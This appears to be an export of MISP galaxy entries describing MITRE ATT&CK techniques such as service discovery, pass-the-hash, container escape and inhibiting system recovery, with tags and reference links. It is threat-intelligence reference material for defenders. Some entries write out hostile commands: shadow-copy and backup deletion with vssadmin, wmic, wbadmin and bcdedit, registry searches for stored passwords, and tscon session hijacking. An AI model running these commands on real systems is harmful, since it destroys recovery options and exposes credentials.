Adversaries may attempt to get a listing of services running on remote hosts and local network infrastructure devices, including those that may be vulnerable to remote software exploitation. Common methods to acquire this information include port and/or vulnerability scans using tools that are brought onto a system.(Citation: CISA AR21-126A FIVEHANDS May 2021)

Within cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems as well.

Within macOS environments, adversaries may use the native Bonjour application to discover services running on other macOS hosts within a network. The Bonjour mDNSResponder daemon automatically registers and advertises a host’s registered services on the network. For example, adversaries can use a mDNS query (such as <code>dns-sd -B _ssh._tcp .</code>) to find other systems broadcasting the ssh service.(Citation: apple doco bonjour description)(Citation: macOS APT Activity Bradley)

The tag is: misp-galaxy:mitre-attack-pattern="Network Service Discovery - T1046"

Table 5822. Table References

Links

https://attack.mitre.org/techniques/T1046

https://developer.apple.com/library/archive/documentation/Cocoa/Conceptual/NetServices/Introduction.html

https://themittenmac.com/what-does-apt-activity-look-like-on-macos/

https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a

Proxy Through Victim - T1604

Adversaries may use a compromised device as a proxy server to the Internet. By utilizing a proxy, adversaries hide the true IP address of their C2 server and associated infrastructure from the destination of the network traffic. This masquerades an adversary’s traffic as legitimate traffic originating from the compromised device, which can evade IP-based restrictions and alerts on certain services, such as bank accounts and social media websites.(Citation: Threat Fabric Exobot)

The most common type of proxy is a SOCKS proxy. It can typically be implemented using standard OS-level APIs and 3rd party libraries with no indication to the user. On Android, adversaries can use the Proxy API to programmatically establish a SOCKS proxy connection, or lower-level APIs to interact directly with raw sockets.

The tag is: misp-galaxy:mitre-attack-pattern="Proxy Through Victim - T1604"

Table 5823. Table References

Links

https://attack.mitre.org/techniques/T1604

https://www.threatfabric.com/blogs/exobot_android_banking_trojan_on_the_rise.html

Windows Management Instrumentation - T1047

Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM) and [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) (WinRM).(Citation: MSDN WMI) Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.(Citation: MSDN WMI)(Citation: FireEye WMI 2015)

An adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for Discovery as well as remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015)

The tag is: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047"

Table 5824. Table References

Links

https://attack.mitre.org/techniques/T1047

https://msdn.microsoft.com/en-us/library/aa394582.aspx

https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf

https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/sans-dfir-2015.pdf

Stored Application Data - T1409

Adversaries may try to access and collect application data resident on the device. Adversaries often target popular applications, such as Facebook, WeChat, and Gmail.(Citation: SWB Exodus March 2019)

Due to mobile OS sandboxing, this technique is only possible in three scenarios:

  • An application stores files in unprotected external storage

  • An application stores files in its internal storage directory with insecure permissions (e.g. 777)

  • The adversary gains root permissions on the device

The tag is: misp-galaxy:mitre-attack-pattern="Stored Application Data - T1409"

Table 5825. Table References

Links

https://attack.mitre.org/techniques/T1409

https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-0.html

https://securitywithoutborders.org/blog/2019/03/29/exodus.html

Inhibit System Recovery - T1490

Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options.

Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) Furthermore, adversaries may disable recovery notifications, then corrupt backups.(Citation: disable_notif_synology_ransom)

A number of native Windows utilities have been used by adversaries to disable or delete system recovery features:

  • <code>vssadmin.exe</code> can be used to delete all volume shadow copies on a system - <code>vssadmin.exe delete shadows /all /quiet</code>

  • [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - <code>wmic shadowcopy delete</code>

  • <code>wbadmin.exe</code> can be used to delete the Windows Backup Catalog - <code>wbadmin.exe delete catalog -quiet</code>

  • <code>bcdedit.exe</code> can be used to disable automatic Windows recovery features by modifying boot configuration data - <code>bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no</code>

  • <code>REAgentC.exe</code> can be used to disable Windows Recovery Environment (WinRE) repair/recovery options of an infected system

On network devices, adversaries may leverage [Disk Wipe](https://attack.mitre.org/techniques/T1561) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.

Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)

The tag is: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490"

Table 5826. Table References

Links

https://attack.mitre.org/techniques/T1490

https://blog.talosintelligence.com/2018/02/olympic-destroyer.html

https://rhinosecuritylabs.com/aws/s3-ransomware-part-2-prevention-and-defense/

https://twitter.com/TheDFIRReport/status/1498657590259109894

https://www.darkreading.com/attacks-breaches/code-hosting-service-shuts-down-after-cyber-attack

https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html

https://www.zdnet.com/article/ransomware-victims-thought-their-backups-were-safe-they-were-wrong/

Server Software Component - T1505

Adversaries may abuse legitimate extensible development features of servers to establish persistent access to systems. Enterprise server applications may include features that allow developers to write and install software or scripts to extend the functionality of the main application. Adversaries may install malicious components to extend and abuse server applications.(Citation: volexity_0day_sophos_FW)

The tag is: misp-galaxy:mitre-attack-pattern="Server Software Component - T1505"

Table 5827. Table References

Links

https://attack.mitre.org/techniques/T1505

https://www.us-cert.gov/ncas/alerts/TA15-314A

https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/

Archive Collected Data - T1560

An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.

Both compression and encryption are done prior to exfiltration, and can be performed using a utility, 3rd party library, or custom method.

The tag is: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560"

Table 5828. Table References

Links

https://attack.mitre.org/techniques/T1560

https://en.wikipedia.org/wiki/List_of_file_signatures

Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)

Authentication cookies are commonly used in web applications, including cloud-based services, after a user has authenticated to the service so credentials are not passed and re-authentication does not need to occur as frequently. Cookies are often valid for an extended period of time, even if the web application is not actively used. After the cookie is obtained through [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539), the adversary then imports the cookie into a browser they control and is able to use the site or application as the user for as long as the session cookie is active. Once logged into the site, an adversary can access sensitive information, read email, or perform actions that the victim account has permissions to perform.

There have been examples of malware targeting session cookies to bypass multi-factor authentication systems.(Citation: Unit 42 Mac Crypto Cookies January 2019)

The tag is: misp-galaxy:mitre-attack-pattern="Web Session Cookie - T1506"

Table 5829. Table References

Links

https://attack.mitre.org/techniques/T1506

https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/

https://wunderwuzzi23.github.io/blog/passthecookie.html

Uncommonly Used Port - T1065

Adversaries may conduct C2 communications over a non-standard port to bypass proxies and firewalls that have been improperly configured.

The tag is: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065"

Table 5830. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1065

Network Information Discovery - T1507

Adversaries may use device sensors to collect information about nearby networks, such as Wi-Fi and Bluetooth.

The tag is: misp-galaxy:mitre-attack-pattern="Network Information Discovery - T1507"

Table 5831. Table References

Links

https://attack.mitre.org/techniques/T1507

Pass the Hash - T1075

Pass the hash (PtH) is a method of authenticating as a user without having access to the user’s cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash. In this technique, valid password hashes for the account being used are captured using a Credential Access technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems.

Windows 7 and higher with KB2871997 require valid domain user credentials or RID 500 administrator hashes. (Citation: NSA Spotting)

The tag is: misp-galaxy:mitre-attack-pattern="Pass the Hash - T1075"

Table 5832. Table References

Links

https://apps.nsa.gov/iaarchive/library/reports/spotting-the-adversary-with-windows-event-log-monitoring.cfm

https://attack.mitre.org/techniques/T1075

https://capec.mitre.org/data/definitions/644.html

Lateral Tool Transfer - T1570

Adversaries may transfer tools or other files between systems in a compromised environment. Once brought into the victim environment (i.e., [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) files may then be copied from one system to another to stage adversary tools or other files over the course of an operation.

Adversaries may copy files between internal victim systems to support lateral movement using inherent file sharing protocols such as file sharing over [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) to connected network shares or with authenticated connections via [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001).(Citation: Unit42 LockerGoga 2019)

Files can also be transferred using native or otherwise present tools on the victim system, such as scp, rsync, curl, sftp, and [ftp](https://attack.mitre.org/software/S0095). In some cases, adversaries may be able to leverage [Web Service](https://attack.mitre.org/techniques/T1102)s such as Dropbox or OneDrive to copy files from one machine to another via shared, automatically synced folders.(Citation: Dropbox Malware Sync)

The tag is: misp-galaxy:mitre-attack-pattern="Lateral Tool Transfer - T1570"

Table 5833. Table References

Links

https://attack.mitre.org/techniques/T1570

https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/

https://www.technologyreview.com/2013/08/21/83143/dropbox-and-similar-services-can-sync-malware/

Suppress Application Icon - T1508

A malicious application could suppress its icon from being displayed to the user in the application launcher to hide the fact that it is installed, and to make it more difficult for the user to uninstall the application. Hiding the application’s icon programmatically does not require any special permissions.

This behavior has been seen in the BankBot/Spy Banker family of malware.(Citation: android-trojan-steals-paypal-2fa)(Citation: sunny-stolen-credentials)(Citation: bankbot-spybanker)

The tag is: misp-galaxy:mitre-attack-pattern="Suppress Application Icon - T1508"

Table 5834. Table References

Links

https://attack.mitre.org/techniques/T1508

https://www.cyber.nj.gov/threat-profiles/android-malware-variants/bankbot-spybanker

https://www.welivesecurity.com/2017/02/22/sunny-chance-stolen-credentials-malicious-weather-app-found-google-play/

https://www.welivesecurity.com/2018/12/11/android-trojan-steals-money-paypal-accounts-2fa/

Cloud Infrastructure Discovery - T1580

An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.

Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a <code>DescribeInstances</code> API within the Amazon EC2 API that can return information about one or more instances within an account, the <code>ListBuckets</code> API that returns a list of all buckets owned by the authenticated sender of the request, the <code>HeadBucket</code> API to determine a bucket’s existence along with access permissions of the request sender, or the <code>GetPublicAccessBlock</code> API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP’s Cloud SDK CLI provides the <code>gcloud compute instances list</code> command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure’s CLI command <code>az vm list</code> lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)

An adversary may enumerate resources using a compromised user’s access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as <code>DescribeDBInstances</code> to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.

The tag is: misp-galaxy:mitre-attack-pattern="Cloud Infrastructure Discovery - T1580"

Table 5835. Table References

Links

https://attack.mitre.org/techniques/T1580

https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/

https://cloud.google.com/sdk/gcloud/reference/compute/instances/list

https://content.fireeye.com/m-trends/rpt-m-trends-2020

https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html

https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html

https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html

https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html

https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html

https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest

https://expel.io/blog/finding-evil-in-aws/

Forge Web Credentials - T1606

Adversaries may forge credential materials that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies, tokens, or other materials to authenticate and authorize user access.

Adversaries may generate these credential materials in order to gain access to web resources. This differs from [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539), [Steal Application Access Token](https://attack.mitre.org/techniques/T1528), and other similar behaviors in that the credentials are new and forged by the adversary, rather than stolen or intercepted from legitimate users.

The generation of web credentials often requires secret values, such as passwords, [Private Keys](https://attack.mitre.org/techniques/T1552/004), or other cryptographic seed values.(Citation: GitHub AWS-ADFS-Credential-Generator) Adversaries may also forge tokens by taking advantage of features such as the AssumeRole and GetFederationToken APIs in AWS, which allow users to request temporary security credentials (i.e., [Temporary Elevated Cloud Access](https://attack.mitre.org/techniques/T1548/005)), or the zmprov gdpak command in Zimbra, which generates a pre-authentication key that can be used to generate tokens for any user in the domain.(Citation: AWS Temporary Security Credentials)(Citation: Zimbra Preauth)

Once forged, adversaries may use these web credentials to access resources (ex: [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550)), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Pass The Cookie)(Citation: Unit 42 Mac Crypto Cookies January 2019)(Citation: Microsoft SolarWinds Customer Guidance)

The tag is: misp-galaxy:mitre-attack-pattern="Forge Web Credentials - T1606"

Table 5836. Table References

Links

https://attack.mitre.org/techniques/T1606

https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp_request.html

https://github.com/damianh/aws-adfs-credential-generator

https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/

https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/

https://wiki.zimbra.com/wiki/Preauth

https://wunderwuzzi23.github.io/blog/passthecookie.html

Remote Desktop Protocol - T1076

Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS). (Citation: TechNet Remote Desktop Services) There are other implementations and third-party tools that provide graphical access [Remote Services](https://attack.mitre.org/techniques/T1021) similar to RDS.

Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1015) technique for Persistence. (Citation: Alperovitch Malware)

Adversaries may also perform RDP session hijacking which involves stealing a legitimate user’s remote session. Typically, a user is notified when someone else is trying to steal their session and prompted with a question. With System permissions and using Terminal Services Console, <code>c:\windows\system32\tscon.exe [session number to be stolen]</code>, an adversary can hijack a session without the need for credentials or prompts to the user. (Citation: RDP Hijacking Korznikov) This can be done remotely or locally and with active or disconnected sessions. (Citation: RDP Hijacking Medium) It can also lead to [Remote System Discovery](https://attack.mitre.org/techniques/T1018) and Privilege Escalation by stealing a Domain Admin or higher privileged account session. All of this can be done by using native Windows commands, but it has also been added as a feature in RedSnarf. (Citation: Kali Redsnarf)

The tag is: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1076"

Table 5837. Table References

Links

http://blog.crowdstrike.com/adversary-tricks-crowdstrike-treats/

http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html

https://attack.mitre.org/techniques/T1076

https://capec.mitre.org/data/definitions/555.html

https://github.com/nccgroup/redsnarf

https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6

https://technet.microsoft.com/en-us/windowsserver/ee236407.aspx

Container Administration Command - T1609

Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.(Citation: Docker Daemon CLI)(Citation: Kubernetes API)(Citation: Kubernetes Kubelet)

In Docker, adversaries may specify an entrypoint during container deployment that executes a script or command, or they may use a command such as <code>docker exec</code> to execute a command within a running container.(Citation: Docker Entrypoint)(Citation: Docker Exec) In Kubernetes, if an adversary has sufficient permissions, they may gain remote execution in a container in the cluster via interaction with the Kubernetes API server, the kubelet, or by running a command such as <code>kubectl exec</code>.(Citation: Kubectl Exec Get Shell)

The tag is: misp-galaxy:mitre-attack-pattern="Container Administration Command - T1609"

Table 5838. Table References

Links

https://attack.mitre.org/techniques/T1609

https://docs.docker.com/engine/reference/commandline/dockerd/

https://docs.docker.com/engine/reference/commandline/exec/

https://docs.docker.com/engine/reference/run/#entrypoint-default-command-to-execute-at-runtime

https://kubernetes.io/docs/concepts/overview/kubernetes-api/

https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/

https://kubernetes.io/docs/tasks/debug-application-cluster/get-shell-running-container/

NTFS File Attributes - T1096

Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)

Adversaries may store malicious data or binaries in file attribute metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus. (Citation: Journey into IR ZeroAccess NTFS EA) (Citation: MalwareBytes ADS July 2015)

The tag is: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1096"

Table 5839. Table References

Links

http://journeyintoir.blogspot.com/2012/12/extracting-zeroaccess-from-ntfs.html

http://msdn.microsoft.com/en-us/library/aa364404

https://attack.mitre.org/techniques/T1096

https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/

https://blogs.technet.microsoft.com/askcore/2010/08/25/ntfs-file-attributes/

https://blogs.technet.microsoft.com/askcore/2013/03/24/alternate-data-streams-in-ntfs/

https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/

https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/

https://posts.specterops.io/host-based-threat-modeling-indicator-design-a9dbbb53d5ea

https://www.symantec.com/connect/articles/what-you-need-know-about-alternate-data-streams-windows-your-data-secure-can-you-restore

Permission Groups Discovery - T1069

Adversaries may attempt to discover group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.

Adversaries may attempt to discover group permission settings in many different ways. This data may provide the adversary with information about the compromised environment that can be used in follow-on activity and targeting.(Citation: CrowdStrike BloodHound April 2018)

The tag is: misp-galaxy:mitre-attack-pattern="Permission Groups Discovery - T1069"

Table 5840. Table References

Links

https://attack.mitre.org/techniques/T1069

https://kubernetes.io/docs/reference/access-authn-authz/authorization/

https://www.crowdstrike.com/blog/hidden-administrative-accounts-bloodhound-to-the-rescue/

Windows Admin Shares - T1077

Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include <code>C$</code>, <code>ADMIN$</code>, and <code>IPC$</code>.

Adversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system over server message block (SMB) (Citation: Wikipedia SMB) to interact with systems using remote procedure calls (RPCs), (Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Service Execution](https://attack.mitre.org/techniques/T1035), and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1075) and certain configuration and patch levels. (Citation: Microsoft Admin Shares)

The [Net](https://attack.mitre.org/software/S0039) utility can be used to connect to Windows admin shares on remote systems using <code>net use</code> commands with valid credentials. (Citation: Technet Net Use)

The tag is: misp-galaxy:mitre-attack-pattern="Windows Admin Shares - T1077"

Table 5841. Table References

Links

http://support.microsoft.com/kb/314984

https://attack.mitre.org/techniques/T1077

https://capec.mitre.org/data/definitions/561.html

https://docs.microsoft.com/en-us/archive/blogs/jepayne/monitoring-what-matters-windows-event-forwarding-for-everyone-even-if-you-already-have-a-siem

https://docs.microsoft.com/en-us/archive/blogs/jepayne/tracking-lateral-movement-part-one-special-groups-and-specific-service-accounts

https://en.wikipedia.org/wiki/Server_Message_Block

https://medium.com/threatpunter/detecting-lateral-movement-using-sysmon-and-splunk-318d3be141bc

https://technet.microsoft.com/bb490717.aspx

https://technet.microsoft.com/en-us/library/cc787851.aspx

Pass the Ticket - T1097

Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account’s password. Kerberos authentication can be used as the first step to lateral movement to a remote system.

In this technique, valid Kerberos tickets for [Valid Accounts](https://attack.mitre.org/techniques/T1078) are captured by [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). A user’s service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access. (Citation: ADSecurity AD Kerberos Attacks) (Citation: GentilKiwi Pass the Ticket)

Silver Tickets can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint). (Citation: ADSecurity AD Kerberos Attacks)

Golden Tickets can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory. (Citation: Campbell 2014)

The tag is: misp-galaxy:mitre-attack-pattern="Pass the Ticket - T1097"

Table 5842. Table References

Links

http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos

http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf

https://adsecurity.org/?p=556

https://attack.mitre.org/techniques/T1097

https://capec.mitre.org/data/definitions/645.html

https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf

Disabling Security Tools - T1089

Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security scanning or event reporting.

The tag is: misp-galaxy:mitre-attack-pattern="Disabling Security Tools - T1089"

Table 5843. Table References

Links

https://attack.mitre.org/techniques/T1089

https://capec.mitre.org/data/definitions/578.html

Space after Filename - T1151

Adversaries can hide a program’s true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app extensions), appending a space to the end of a filename will change how the file is processed by the operating system. For example, if there is a Mach-O executable file called evil.bin, when it is double clicked by a user, it will launch Terminal.app and execute. If this file is renamed to evil.txt, then when double clicked by a user, it will launch with the default text editing application (not executing the binary). However, if the file is renamed to "evil.txt " (note the space at the end), then when double clicked by a user, the true file type is determined by the OS and handled appropriately and the binary will be executed (Citation: Mac Backdoors are back).

Adversaries can use this feature to trick users into double clicking benign-looking files of any format and ultimately executing something malicious.

The tag is: misp-galaxy:mitre-attack-pattern="Space after Filename - T1151"

Table 5844. Table References

Links

https://arstechnica.com/security/2016/07/after-hiatus-in-the-wild-mac-backdoors-are-suddenly-back/

https://attack.mitre.org/techniques/T1151

https://capec.mitre.org/data/definitions/649.html

Escape to Host - T1611

Adversaries may break out of a container to gain access to the underlying host. This can allow an adversary access to other containerized resources from the host level or to the host itself. In principle, containerized resources should provide a clear separation of application functionality and be isolated from the host environment.(Citation: Docker Overview)

There are multiple ways an adversary may escape to a host environment. Examples include creating a container configured to mount the host’s filesystem using the bind parameter, which allows the adversary to drop payloads and execute control utilities such as cron on the host; utilizing a privileged container to run commands or load a malicious kernel module on the underlying host; or abusing system calls such as unshare and keyctl to escalate privileges and steal secrets.(Citation: Docker Bind Mounts)(Citation: Trend Micro Privileged Container)(Citation: Intezer Doki July 20)(Citation: Container Escape)(Citation: Crowdstrike Kubernetes Container Escape)(Citation: Keyctl-unmask)

Additionally, an adversary may be able to exploit a compromised container with a mounted container management socket, such as docker.sock, to break out of the container via a [Container Administration Command](https://attack.mitre.org/techniques/T1609).(Citation: Container Escape) Adversaries may also escape via [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), such as exploiting vulnerabilities in global symbolic links in order to access the root directory of a host machine.(Citation: Windows Server Containers Are Open)

Gaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, or setting up a command and control channel on the host.

The tag is: misp-galaxy:mitre-attack-pattern="Escape to Host - T1611"

Table 5845. Table References

Links

https://0xn3va.gitbook.io/cheat-sheets/container/escaping

https://attack.mitre.org/techniques/T1611

https://docs.docker.com/get-started/overview/

https://docs.docker.com/storage/bind-mounts/

https://unit42.paloaltonetworks.com/windows-server-containers-vulnerabilities/

https://www.antitree.com/2020/07/keyctl-unmask-going-florida-on-the-state-of-containerizing-linux-keyrings/

https://www.crowdstrike.com/blog/cve-2022-0185-kubernetes-container-escape-using-linux-kernel-exploit/

https://www.intezer.com/blog/cloud-security/watch-your-containers-doki-infecting-docker-servers-in-the-cloud/

https://www.trendmicro.com/en_us/research/19/l/why-running-a-privileged-container-in-docker-is-a-bad-idea.html

Create strategic plan - T1231

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1231).

Strategic plans outline the mission, vision, and goals for an adversary at a high level in relation to the key partners, topics, and functions the adversary carries out. (Citation: KPMGChina5Year) (Citation: China5YearPlans) (Citation: ChinaUN)

The tag is: misp-galaxy:mitre-attack-pattern="Create strategic plan - T1231"

Table 5846. Table References

Links

https://attack.mitre.org/techniques/T1231

Capture SMS Messages - T1412

A malicious application could capture sensitive data sent via SMS, including authentication credentials. SMS is frequently used to transmit codes used for multi-factor authentication.

On Android, a malicious application must request and obtain permission (either at app install time or run time) in order to receive SMS messages. Alternatively, a malicious application could attempt to perform an operating system privilege escalation attack to bypass the permission requirement.

On iOS, applications cannot access SMS messages in normal operation, so an adversary would need to attempt to perform an operating system privilege escalation attack to potentially be able to access SMS messages.

The tag is: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412"

Table 5847. Table References

Links

https://attack.mitre.org/techniques/T1412

Credentials in Registry - T1214

The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.

Example commands to find Registry keys related to password information: (Citation: Pentestlab Stored Credentials)

  • Local Machine Hive: <code>reg query HKLM /f password /t REG_SZ /s</code>

  • Current User Hive: <code>reg query HKCU /f password /t REG_SZ /s</code>

The tag is: misp-galaxy:mitre-attack-pattern="Credentials in Registry - T1214"

Table 5848. Table References

Links

https://attack.mitre.org/techniques/T1214

https://pentestlab.blog/2017/04/19/stored-credentials/

System Time Discovery - T1124

An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network. (Citation: MSDN System Time)(Citation: Technet Windows Time Service)

System time information may be gathered in a number of ways, such as with [Net](https://attack.mitre.org/software/S0039) on Windows by performing <code>net time \\hostname</code> to gather the system time on a remote system. The victim’s time zone may also be inferred from the current system time or gathered by using <code>w32tm /tz</code>.(Citation: Technet Windows Time Service)

